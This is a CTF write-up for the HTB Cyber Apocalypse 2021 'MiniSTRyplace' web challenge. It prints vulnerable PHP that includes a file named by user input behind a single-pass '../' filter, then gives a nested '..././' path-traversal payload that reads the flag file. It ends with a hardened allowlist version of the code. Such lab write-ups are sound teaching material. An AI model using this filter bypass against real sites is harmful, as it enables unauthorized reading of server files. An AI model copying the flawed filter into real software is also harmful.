HTB Cyber Apocalypse CTF 2021: MiniSTRyplace

Mudhalai Mr
2 min read · Apr 24, 2021

MiniSTRyplace is a web-based challenge with a difficulty of one star.

Let’s start by reading the source code from the folder provided.

Wait! What??! A flag file? Well, it's fake:

CHTB{f4k3_fl4g_f0r_t3st1ng}

In the challenge directory, I found the ‘index.php’ file:

<html>
<header>
    <meta name='author' content='bertolis, makelaris'>
    <title>Ministry of Defence</title>
    <link rel="stylesheet" href="/static/css/main.css">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootswatch/4.5.0/slate/bootstrap.min.css">
</header>
<body>
    <div class="language">
        <a href="?lang=en.php">EN</a>
        <a href="?lang=qw.php">QW</a>
    </div>
    <?php
    $lang = ['en.php', 'qw.php'];
    include('pages/' . (isset($_GET['lang']) ? str_replace('../', '', $_GET['lang']) : $lang[array_rand($lang)]));
    ?>
</body>
</html>

As you can see, this is a Local File Inclusion (LFI) challenge. We have to trick the program into including the flag file so that we can read it.

But the input is sanitized: we cannot use “../” to go up a directory because the program removes it. The removal is a single str_replace pass that is not repeated on its own output, so we can bypass the sanitization:

Input: ..././
Output: ../

Now we can easily bypass the sanitization and go up a directory.

The Dockerfile specifies that the flag file is in the root directory.

Let’s GET the flag:

?lang=..././..././..././..././flag
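Why the filter fails and what a fix looks like, as an added example that is not part of the original write-up or the challenge's code: the parameter is matched against the allowlist that index.php already defines in $lang instead of being rewritten. The helper names challenge_filter and resolve_page and the temporary directory are assumptions made for this demo.

```php
<?php
// Added example, not the challenge's code. Helper names are hypothetical.

// The challenge's filter: one left-to-right pass, output never re-scanned.
function challenge_filter(string $input): string
{
    return str_replace('../', '', $input);
}

// Hardened lookup: exact allowlist match, then a canonical-path check.
function resolve_page(string $requested, array $allowed, string $pagesDir): ?string
{
    if (!in_array($requested, $allowed, true)) {
        return null;                       // anything not listed is rejected
    }
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . '/' . $requested);
    if ($base === false || $path === false) {
        return null;                       // missing directory or file
    }
    // Defence in depth: the resolved file must sit inside the pages directory.
    return strpos($path, $base . DIRECTORY_SEPARATOR) === 0 ? $path : null;
}

// Constructed sample data: a temporary directory standing in for pages/.
$pagesDir = sys_get_temp_dir() . '/pages_demo_' . getmypid();
mkdir($pagesDir);
$allowed = ['en.php', 'qw.php'];
foreach ($allowed as $name) {
    file_put_contents("$pagesDir/$name", "page $name");
}

// Inputs taken from the write-up: a normal value, the blocked form, the bypass.
foreach (['en.php', '../flag', '..././flag'] as $input) {
    $resolved = resolve_page($input, $allowed, $pagesDir);
    printf("%-11s filter: %-8s allowlist: %s\n",
        $input, challenge_filter($input), $resolved === null ? 'rejected' : 'accepted');
}

// Remove the sample files.
foreach ($allowed as $name) {
    unlink("$pagesDir/$name");
}
rmdir($pagesDir);
```

In index.php the include would run only on a non-null result from resolve_page, falling back to a default page otherwise.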

Thank you :) - Mudhalai Mr Team 1nf1n1ty

Mudhalai Mr

<>AKA Gowtham Student at SASTRA Deemed university, Core team member DSC SASTRA </>